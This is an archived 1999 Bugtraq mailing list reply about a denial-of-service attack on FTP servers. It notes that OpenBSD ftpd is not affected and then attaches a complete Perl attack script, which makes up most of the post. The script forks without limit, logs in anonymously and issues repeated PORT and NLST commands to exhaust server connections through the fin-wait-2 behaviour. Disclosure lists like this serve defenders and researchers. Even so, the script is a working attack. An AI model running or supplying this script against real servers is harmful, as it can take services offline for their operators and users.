Bugtraq mailing list archives

Re: FTP denial of service attack

From: avalon () COOMBS ANU EDU AU (Darren Reed)
Date: Wed, 8 Dec 1999 18:01:53 +1100


In some mail from Theo de Raadt, sie said:
[...]

The OpenBSD ftpd has never permitted more than 1 connection at a time
in PASV mode, thus this particular denial of service attack does not
work.


Excellent.

I caused myself some difficulties by accidentally starting up 400 perl
instances, though..


There's no helping pilot error ;)

Below is an attached perl script which attacks based on the fin-wait-2
`problem'.

Darren

#!/usr/bin/perl

$DOS_HOST="localhost";

use IO::Socket;

$pid = $$;
$num = 0;

while (1) {
        while (fork) {
                $sock = IO::Socket::INET->new(
                        Proto    => "tcp",
                        PeerAddr => $DOS_HOST,
                        PeerPort => "ftp(21)",
                );
                last if (!$sock);
                $me = getsockname($sock);
                ($mport, $mip) = unpack_sockaddr_in($me);

                if (!$sock) {
                        print "connect failed!\n";
                        waitpid -1,0;
                }

                $sock->autoflush(1);

                while (<$sock>) {
                        print;
                        print $sock "USER anonymous\r\n" if (/^220 .*/);
                        print $sock "PASS root@\r\n" if (/^331 .*/);

                        if (/^150 .*/) {
                                $conn[$num++] = $x->accept();
                        } elsif (/^200 .*/) {
                                print $sock "NLST\r\n";
                        } elsif (/^230 .*/ || /^226 .*/) {

                                $x = IO::Socket::INET->new(
                                        Proto    => "tcp",
                                        LocalAddr => inet_ntoa($mip),
                                        Listen => 1,
                                );
                                last if (!$x);

                                $lsock[$num] = $x;
                                $local = getsockname($x);
                                ($lport, $lip) = unpack_sockaddr_in($local);
                                ($sip = inet_ntoa($mip)) =~ s/\./,/g;
                                $lp[0] = $lport >> 8;
                                $lp[1] = $lport & 0xff;

                                print $sock "PORT $sip,$lp[1]\r\n";
                        }
                        last if (/^530 .*/);
                }
                waitpid -1,0;
        }
        sleep(5);
}

Current thread:

[Debian] New version of htdig released, (continued)
- - - [Debian] New version of htdig released Aleph One (Dec 10)
    - Fundamental flaw in UnixWare 7 security Brock Tellier (Dec 10)
    - Solaris sadmind Buffer Overflow Vulnerability Alfred Huger (Dec 10)
  - Re: FTP denial of service attack bert hubert (Dec 07)
    - Re: FTP denial of service attack antirez () INVECE ORG (Dec 09)
  - Re: FTP denial of service attack Henrik Nordstrom (Dec 07)
    - Re: FTP denial of service attack Darren Reed (Dec 07)
    - Re: FTP denial of service attack Henrik Nordstrom (Dec 07)
    - Re: FTP denial of service attack Darren Reed (Dec 07)
  - Re: FTP denial of service attack Theo de Raadt (Dec 07)
    - Re: FTP denial of service attack Darren Reed (Dec 07)
  - Re: FTP denial of service attack Gregory A Lundberg (Dec 10)
  - RSAREF2 buffer overflow patch Gerardo Richarte (Dec 10)
- Re: new IE5 remote exploit Shane Hird (Dec 07)
- NT WinLogon VM contains plaintext password visible in admin mode Robert Horvick (Dec 07)
  - Re: NT WinLogon VM contains plaintext password visible in admin mode Chris Paget (Dec 08)
- [Debian] New version of sendmail released Aleph One (Dec 07)
- The money: protocol in Internet Explorer Richard M. Smith (Dec 20)
  - Re: The money: protocol in Internet Explorer David Litchfield (Dec 21)
- Remote D.o.S Attack in DNS PRO v5.7 WinNT From FBLI Software Vulnerability Ussr Labs (Dec 20)